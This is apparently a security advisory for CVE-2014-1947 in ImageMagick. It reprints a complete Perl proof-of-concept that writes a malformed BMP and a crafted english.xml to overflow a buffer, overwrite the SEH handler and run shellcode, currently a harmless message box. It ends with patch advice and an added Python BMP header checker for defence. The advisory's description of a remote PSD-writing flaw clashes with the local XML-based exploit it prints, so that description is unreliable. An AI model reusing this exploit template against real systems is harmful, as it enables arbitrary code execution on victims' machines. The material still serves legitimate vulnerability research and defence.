ImageMagick PSD Image File Processing Remote Buffer Overflow Vulnerability (CVE-2014-1947)

Published: 2014-02-19
Updated: 2014-02-22

Affected systems:
ImageMagick ImageMagick < 6.8.8-5
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 65683
CVE(CAN) ID: CVE-2014-1947

ImageMagick is an open-source image viewing and editing tool for Unix/Linux platforms. ImageMagick 6.5.4 and other versions have a security vulnerability in the WritePSDImage() function in coders/psd.c, which is triggered while processing layers during PSD image writing. A context-dependent attacker can exploit this to corrupt memory, causing a crash or arbitrary code execution.

<*Source: Justin Grant

  Links: http://www.exploit-db.com/exploits/31688/
        http://osvdb.org/show/osvdb/103206
*>

Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

#!/usr/bin/perl
########################################################################################
# Exploit Title: ImageMagick < 6.8.8-5 - Local Buffer Overflow (SEH)
# Date: 2-13-2014
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: ImageMagick (all versions prior to 6.8.8-5)
# Software Link: http://ftp.sunet.se/pub/multimedia/graphics/ImageMagick/binaries/
# Version Tested: 6.8.8-4
# Tested On: Windows XP SP3
########################################################################################
# Credits:
#
# CVE-2014-1947 published Feb 08 2014
#             by Justin Grant
#             http://www.securityfocus.com/bid/65478/info
#
########################################################################################
# Overview:
#
# I saw the notice for this CVE today but there were no known published exploits so
# I figured I'd put together this quick POC. Note, all app modules for the tested
# version were compiled with safeSEH so my use of an OS module may require adjustment 
# of the offsets. There also appears to be several bad chars that fail the sploit.
# For this POC I only generate a basic messagebox using FatalAppExit(). It may take
# some work to get it to do more.
#
# How it works:
#
# This particular BOF takes advantage of insecure handling of the english.xml file
# which the app uses to display various error messages. I didn't spend much time
# investigating the app so there may be additional vulnerable locations
#
# This script generates two files:
# 1) a malformed .bmp file that will cause ImageMagick to generate a specific
#      error when opened (LengthAndFilesizeDoNotMatch), as defined in the
#      english.xml file
# 2) a modified  english.xml file that replaces the original error message with
#      our exploit code
#
# To test this POC:
# 1) run the script, replace the original english.xml file (in App's folder)
# 2) open the .bmp file with ImageMagick
#########################################################################################

# file write function
sub write_file {
  my ($file, $buffer) = @_;
  open(FILE, ">$file");
  print FILE $buffer;
  close(FILE);
  print "Exploit file [" . $file . "] created\n";
  print "Buffer size: " . length($buffer) . "\n";
}

# create bmp file header; needs to be a valid header to generate necessary error
sub bmp_header {
  my $header = "\x42\x4d"; # BM
  $header = $header . "\x46\x00\x00\x00"; # file size (70 bytes)
  $header = $header . "\x00\x00\x00\x00"; # unused
  $header = $header . "\x36\x00\x00\x00"; # bitmap offset
  $header = $header . "\x28\x00\x00\x00"; # header size
  $header = $header . "\x02\x00\x00\x00"; # width
  $header = $header . "\x02\x00\x00\x00"; # height
  $header = $header . "\x01\x00"; # num of color planes
  $header = $header . "\x18\x00"; # num of bits per pixel
  $header = $header . "\x00\x00\x00\x00"; # compression (none)
  $header = $header . "\x10\x00\x00\x00"; # image size
  $header = $header . "\x13\x0b\x00\x00"; # horizontal resolution (2,835 pixels/meter)
  $header = $header . "\x13\x0b\x00\x00"; # vertical resolution (2,835 pixels/meter)
  $header = $header . "\x00\x00\x00\x00"; # colors in palette
  $header = $header . "\x00\x00\x00\x00"; # important colors
  return $header;
}

# Construct the corrupted bmp file which will trigger the vuln
my $header = bmp_header();
my $data = "\x41" x (5000 - length($header)); # arbitrary file data filler
my $buffer = $header.$data;
write_file("corrupt.bmp", $buffer);

# construct the buffer payload for our xml file
my $buffsize = 100000;
my $junk = "\x41" x 62504; # offset to next seh at 568
my $nseh = "\xeb\x32\x90\x90"; # overwrite next seh with jmp instruction (20 bytes)
my $seh = pack("V", 0x74c82f4f); # : pop ebp  pop ebx  ret
               # ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\WINDOWS\system32\OLEACC.dll)
my $junk2 = "\x41" x 12; # there are at least two possible offsets -- 1 for  file-> open and 1 for the open file menubar button
my $nops = "\x90" x 100;

# this is just a POC shellcode that displays a messagebox using the FatalAppExit function
my $shell = "\xb9\x7c\xec\xa5\x7c" . # Unicode String "FailSilently" (address may vary)
        "\x31\xc0" . # xor eax, eax
        "\xbb\xb2\x1b\x86\x7c" . # kernel32.dll FatalAppExit()
        "\x51" . # push ecx
        "\x50" . # push eax
        "\xff\xd3"; # call ebx

my $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer
my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk
$sploit = $sploit.$fill; # assemble the final buffer

# build the malicious xml file
my $xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><locale name=\"english\"><exception><corrupt><image><warning><message name=\"LengthAndFilesizeDoNotMatch\">";
$xml = $xml . $sploit;
$xml = $xml . "</message></warning></image></corrupt></exception></locale>";
my $buffer = $xml;
write_file("english.xml", $buffer);

Recommendation:
--------------------------------------------------------------------------------
Vendor patch: ImageMagick
-----------
The vendor has already released an upgrade patch to fix this security issue; please download it from the vendor's homepage: http://www.imagemagick.org/
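Beyond upgrading, untrusted BMP input can be screened before it reaches the image library. The Python below is an added example, not part of the advisory or of the PoC: it rebuilds the 54-byte header the PoC writes (file size declared as 70 bytes, padded to 5000) and reports the header/file-length inconsistency that ImageMagick surfaces as the LengthAndFilesizeDoNotMatch warning, plus the related row-size and pixel-offset checks a general BMP validator would make. It assumes only the standard BITMAPFILEHEADER/BITMAPINFOHEADER layout.

```python
import struct

# BITMAPFILEHEADER (14 bytes): magic, file size, reserved x2, pixel data offset
FILE_HDR = struct.Struct("<2sIHHI")
# BITMAPINFOHEADER (40 bytes): header size, width, height, planes, bpp,
# compression, image size, x/y resolution, colors used, important colors
INFO_HDR = struct.Struct("<IiiHHIIiiII")


def poc_style_bmp(total_len=5000):
    """Constructed sample: the same 54-byte header the PoC emits (it declares
    a 70-byte file) followed by filler; total_len=5000 mirrors corrupt.bmp."""
    file_hdr = FILE_HDR.pack(b"BM", 70, 0, 0, 54)
    info_hdr = INFO_HDR.pack(40, 2, 2, 1, 24, 0, 16, 2835, 2835, 0, 0)
    hdr = file_hdr + info_hdr
    return hdr + b"A" * (total_len - len(hdr))


def check_bmp(data):
    """Return a list of findings; an empty list means the header is
    self-consistent with the file it sits in."""
    findings = []
    if len(data) < FILE_HDR.size + INFO_HDR.size:
        return ["file shorter than BMP headers"]
    magic, declared_size, _, _, pixel_off = FILE_HDR.unpack_from(data, 0)
    if magic != b"BM":
        findings.append("bad magic")
    (hdr_size, width, height, _planes, bpp, comp,
     img_size, _, _, _, _) = INFO_HDR.unpack_from(data, FILE_HDR.size)
    if hdr_size != INFO_HDR.size:
        findings.append(f"unexpected DIB header size {hdr_size}")
    # This is the mismatch ImageMagick reports as LengthAndFilesizeDoNotMatch.
    if declared_size != len(data):
        findings.append(f"declared size {declared_size} != actual {len(data)}")
    # Uncompressed rows are padded to a 4-byte boundary.
    row_bytes = ((width * bpp + 31) // 32) * 4
    expected = row_bytes * abs(height)
    if comp == 0 and img_size not in (0, expected):
        findings.append(f"image size {img_size} != expected {expected}")
    if pixel_off + expected > len(data):
        findings.append("pixel data extends past end of file")
    return findings


if __name__ == "__main__":
    for name, blob in (("poc-style", poc_style_bmp()), ("consistent", poc_style_bmp(70))):
        print(name, check_bmp(blob) or "ok")
```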